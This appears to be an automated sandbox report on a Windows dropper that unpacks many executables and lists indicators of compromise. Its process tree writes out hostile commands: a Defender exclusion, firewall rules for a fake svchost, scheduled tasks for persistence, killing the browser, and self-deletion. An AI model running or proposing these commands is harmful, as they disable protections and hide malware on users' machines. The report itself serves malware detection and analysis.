d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 290 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 409 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1212 Fri051e1e7444.exe 1212 Fri051e1e7444.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3040 Process not Found -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 2196 fMihVGAjzzxUqeGpoFzxWund.exe 4236 D6EA.exe 6672 EAFC.exe 7484 MicrosoftEdgeCP.exe 7484 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeAssignPrimaryTokenPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeLockMemoryPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeIncreaseQuotaPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeMachineAccountPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeTcbPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeSecurityPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeTakeOwnershipPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeLoadDriverPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeSystemProfilePrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeSystemtimePrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeProfSingleProcessPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeIncBasePriorityPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeCreatePagefilePrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeCreatePermanentPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeBackupPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeRestorePrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeShutdownPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeDebugPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeAuditPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeSystemEnvironmentPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeChangeNotifyPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeRemoteShutdownPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeUndockPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeSyncAgentPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeEnableDelegationPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeManageVolumePrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeImpersonatePrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeCreateGlobalPrivilege 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: 31 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: 32 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: 33 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: 34 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: 35 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe Token: SeDebugPrivilege 4072 1Olo_be130gb5SrdgovhC8zX.exe Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeRestorePrivilege 1644 WerFault.exe Token: SeBackupPrivilege 1644 WerFault.exe Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeDebugPrivilege 692 Process not Found Token: SeDebugPrivilege 3852 powershell.exe Token: SeDebugPrivilege 3204 DownFlSetup999.exe Token: SeDebugPrivilege 1644 WerFault.exe Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeDebugPrivilege 5092 WerFault.exe Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found Token: SeShutdownPrivilege 3040 Process not Found Token: SeCreatePagefilePrivilege 3040 Process not Found -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3040 Process not Found 3040 Process not Found 5320 setup.tmp 10844 installer.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3040 Process not Found 3040 Process not Found 3040 Process not Found -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3040 Process not Found 11200 MicrosoftEdge.exe 6136 MicrosoftEdgeCP.exe 7484 MicrosoftEdgeCP.exe 7484 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1212 wrote to memory of 1040 1212 Fri051e1e7444.exe 70 PID 1212 wrote to memory of 1040 1212 Fri051e1e7444.exe 70 PID 1212 wrote to memory of 1804 1212 Fri051e1e7444.exe 71 PID 1212 wrote to memory of 1804 1212 Fri051e1e7444.exe 71 PID 1212 wrote to memory of 1804 1212 Fri051e1e7444.exe 71 PID 1212 wrote to memory of 2132 1212 Fri051e1e7444.exe 77 PID 1212 wrote to memory of 2132 1212 Fri051e1e7444.exe 77 PID 1212 wrote to memory of 2132 1212 Fri051e1e7444.exe 77 PID 1212 wrote to memory of 1360 1212 Fri051e1e7444.exe 76 PID 1212 wrote to memory of 1360 1212 Fri051e1e7444.exe 76 PID 1212 wrote to memory of 1360 1212 Fri051e1e7444.exe 76 PID 1212 wrote to memory of 2996 1212 Fri051e1e7444.exe 75 PID 1212 wrote to memory of 2996 1212 Fri051e1e7444.exe 75 PID 1212 wrote to memory of 1056 1212 Fri051e1e7444.exe 74 PID 1212 wrote to memory of 1056 1212 Fri051e1e7444.exe 74 PID 1212 wrote to memory of 1056 1212 Fri051e1e7444.exe 74 PID 1212 wrote to memory of 3592 1212 Fri051e1e7444.exe 72 PID 1212 wrote to memory of 3592 1212 Fri051e1e7444.exe 72 PID 1212 wrote to memory of 3592 1212 Fri051e1e7444.exe 72 PID 1212 wrote to memory of 2232 1212 Fri051e1e7444.exe 73 PID 1212 wrote to memory of 2232 1212 Fri051e1e7444.exe 73 PID 1212 wrote to memory of 2232 1212 Fri051e1e7444.exe 73 PID 1212 wrote to memory of 3732 1212 Fri051e1e7444.exe 89 PID 1212 wrote to memory of 3732 1212 Fri051e1e7444.exe 89 PID 1212 wrote to memory of 3732 1212 Fri051e1e7444.exe 89 PID 1212 wrote to memory of 2148 1212 Fri051e1e7444.exe 88 PID 1212 wrote to memory of 2148 1212 Fri051e1e7444.exe 88 PID 1212 wrote to memory of 2148 1212 Fri051e1e7444.exe 88 PID 1212 wrote to memory of 2864 1212 Fri051e1e7444.exe 87 PID 1212 wrote to memory of 2864 1212 Fri051e1e7444.exe 87 PID 1212 wrote to memory of 2864 1212 Fri051e1e7444.exe 87 PID 1212 wrote to memory of 2460 1212 Fri051e1e7444.exe 86 PID 1212 wrote to memory of 2460 1212 Fri051e1e7444.exe 86 PID 1212 wrote to memory of 2460 1212 Fri051e1e7444.exe 86 PID 1212 wrote to memory of 2516 1212 Fri051e1e7444.exe 85 PID 1212 wrote to memory of 2516 1212 Fri051e1e7444.exe 85 PID 1212 wrote to memory of 2516 1212 Fri051e1e7444.exe 85 PID 1212 wrote to memory of 4072 1212 Fri051e1e7444.exe 84 PID 1212 wrote to memory of 4072 1212 Fri051e1e7444.exe 84 PID 1212 wrote to memory of 4072 1212 Fri051e1e7444.exe 84 PID 1212 wrote to memory of 3080 1212 Fri051e1e7444.exe 83 PID 1212 wrote to memory of 3080 1212 Fri051e1e7444.exe 83 PID 1212 wrote to memory of 3080 1212 Fri051e1e7444.exe 83 PID 1212 wrote to memory of 2948 1212 Fri051e1e7444.exe 82 PID 1212 wrote to memory of 2948 1212 Fri051e1e7444.exe 82 PID 1212 wrote to memory of 2948 1212 Fri051e1e7444.exe 82 PID 1212 wrote to memory of 3024 1212 Fri051e1e7444.exe 81 PID 1212 wrote to memory of 3024 1212 Fri051e1e7444.exe 81 PID 1212 wrote to memory of 3024 1212 Fri051e1e7444.exe 81 PID 1212 wrote to memory of 2828 1212 Fri051e1e7444.exe 80 PID 1212 wrote to memory of 2828 1212 Fri051e1e7444.exe 80 PID 1360 wrote to memory of 2196 1360 fMihVGAjzzxUqeGpoFzxWund.exe 91 PID 1360 wrote to memory of 2196 1360 fMihVGAjzzxUqeGpoFzxWund.exe 91 PID 1360 wrote to memory of 2196 1360 fMihVGAjzzxUqeGpoFzxWund.exe 91 PID 1360 wrote to memory of 2196 1360 fMihVGAjzzxUqeGpoFzxWund.exe 91 PID 1360 wrote to memory of 2196 1360 fMihVGAjzzxUqeGpoFzxWund.exe 91 PID 1360 wrote to memory of 2196 1360 fMihVGAjzzxUqeGpoFzxWund.exe 91 PID 2516 wrote to memory of 1172 2516 vKWWQ13x_IxdTnJBebOhylKA.exe 92 PID 2516 wrote to memory of 1172 2516 vKWWQ13x_IxdTnJBebOhylKA.exe 92 PID 2516 wrote to memory of 1172 2516 vKWWQ13x_IxdTnJBebOhylKA.exe 92 PID 2516 wrote to memory of 1172 2516 vKWWQ13x_IxdTnJBebOhylKA.exe 92 PID 2516 wrote to memory of 1172 2516 vKWWQ13x_IxdTnJBebOhylKA.exe 92 PID 2516 wrote to memory of 1172 2516 vKWWQ13x_IxdTnJBebOhylKA.exe 92 PID 2516 wrote to memory of 1172 2516 vKWWQ13x_IxdTnJBebOhylKA.exe 92
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2720
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2712
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2624
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2436
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2424
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1868
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1380
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1196
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1100
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:956
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:348
-
C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"C:\Users\Admin\AppData\Local\Temp\Fri051e1e7444.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Users\Admin\Pictures\Adobe Films\0XBqGgfq5YtuPiFuiEtC0Itj.exe"C:\Users\Admin\Pictures\Adobe Films\0XBqGgfq5YtuPiFuiEtC0Itj.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1040
-
-
C:\Users\Admin\Pictures\Adobe Films\hgLhV7VJCm2E5ZeR2koRQLem.exe"C:\Users\Admin\Pictures\Adobe Films\hgLhV7VJCm2E5ZeR2koRQLem.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1804 -
C:\Users\Admin\Pictures\Adobe Films\hgLhV7VJCm2E5ZeR2koRQLem.exe"C:\Users\Admin\Pictures\Adobe Films\hgLhV7VJCm2E5ZeR2koRQLem.exe"3⤵
- Executes dropped EXE
PID:4944
-
-
-
C:\Users\Admin\Pictures\Adobe Films\AVX02z0lmiqaeiefNhJSJk7I.exe"C:\Users\Admin\Pictures\Adobe Films\AVX02z0lmiqaeiefNhJSJk7I.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3592 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im AVX02z0lmiqaeiefNhJSJk7I.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\AVX02z0lmiqaeiefNhJSJk7I.exe" & del C:\ProgramData\*.dll & exit3⤵PID:2180
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im AVX02z0lmiqaeiefNhJSJk7I.exe /f4⤵
- Kills process with taskkill
PID:4400
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:1056
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xxXvuV4EWPaBs23hksyUdxBE.exe"C:\Users\Admin\Pictures\Adobe Films\xxXvuV4EWPaBs23hksyUdxBE.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2232 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4588
-
-
-
C:\Users\Admin\Pictures\Adobe Films\iIvH5FxG4UqEvw9X0aMhKsh5.exe"C:\Users\Admin\Pictures\Adobe Films\iIvH5FxG4UqEvw9X0aMhKsh5.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1056 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:1712
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:3728
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\bqGFbzTHh6GxWpbCl2pSkDt8.exe"C:\Users\Admin\Pictures\Adobe Films\bqGFbzTHh6GxWpbCl2pSkDt8.exe"2⤵
- Executes dropped EXE
PID:2996 -
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4420 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit4⤵PID:5012
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f5⤵
- Kills process with taskkill
PID:4236
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:4528
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\fMihVGAjzzxUqeGpoFzxWund.exe"C:\Users\Admin\Pictures\Adobe Films\fMihVGAjzzxUqeGpoFzxWund.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Users\Admin\Pictures\Adobe Films\fMihVGAjzzxUqeGpoFzxWund.exe"C:\Users\Admin\Pictures\Adobe Films\fMihVGAjzzxUqeGpoFzxWund.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2196
-
-
-
C:\Users\Admin\Pictures\Adobe Films\t5BHfszhim40psf0Ku5XwE1g.exe"C:\Users\Admin\Pictures\Adobe Films\t5BHfszhim40psf0Ku5XwE1g.exe"2⤵
- Executes dropped EXE
PID:2132
-
-
C:\Users\Admin\Pictures\Adobe Films\12xR7jc7fLIwbgrjD6aub8vg.exe"C:\Users\Admin\Pictures\Adobe Films\12xR7jc7fLIwbgrjD6aub8vg.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:2828 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:960
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:4632
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
PID:6052
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:1508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵PID:5304
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:5632
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:4284
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\aZuHKLVs32nDMGT9GPDzQQKX.exe"C:\Users\Admin\Pictures\Adobe Films\aZuHKLVs32nDMGT9GPDzQQKX.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3024
-
-
C:\Users\Admin\Pictures\Adobe Films\8OD2RNk52y6HyC_UHdjnbYIC.exe"C:\Users\Admin\Pictures\Adobe Films\8OD2RNk52y6HyC_UHdjnbYIC.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2948
-
-
C:\Users\Admin\Pictures\Adobe Films\bpet4Jfh0Jl3fT6UUfUcDOBu.exe"C:\Users\Admin\Pictures\Adobe Films\bpet4Jfh0Jl3fT6UUfUcDOBu.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3080
-
-
C:\Users\Admin\Pictures\Adobe Films\1Olo_be130gb5SrdgovhC8zX.exe"C:\Users\Admin\Pictures\Adobe Films\1Olo_be130gb5SrdgovhC8zX.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4072 -
C:\Users\Admin\Pictures\Adobe Films\1Olo_be130gb5SrdgovhC8zX.exe"C:\Users\Admin\Pictures\Adobe Films\1Olo_be130gb5SrdgovhC8zX.exe"3⤵
- Executes dropped EXE
PID:6132
-
-
C:\Users\Admin\Pictures\Adobe Films\1Olo_be130gb5SrdgovhC8zX.exe"C:\Users\Admin\Pictures\Adobe Films\1Olo_be130gb5SrdgovhC8zX.exe"3⤵
- Executes dropped EXE
PID:1396
-
-
-
C:\Users\Admin\Pictures\Adobe Films\vKWWQ13x_IxdTnJBebOhylKA.exe"C:\Users\Admin\Pictures\Adobe Films\vKWWQ13x_IxdTnJBebOhylKA.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Users\Admin\Pictures\Adobe Films\vKWWQ13x_IxdTnJBebOhylKA.exe"C:\Users\Admin\Pictures\Adobe Films\vKWWQ13x_IxdTnJBebOhylKA.exe"3⤵
- Executes dropped EXE
PID:1172 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 9644⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4516
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\y3CTXvi1Cp2Ojy7XgUMJ61TV.exe"C:\Users\Admin\Pictures\Adobe Films\y3CTXvi1Cp2Ojy7XgUMJ61TV.exe"2⤵
- Executes dropped EXE
PID:2460
-
-
C:\Users\Admin\Pictures\Adobe Films\enKbTHFfgmbEDWWc3Iwn2kpk.exe"C:\Users\Admin\Pictures\Adobe Films\enKbTHFfgmbEDWWc3Iwn2kpk.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2864 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
PID:1592
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
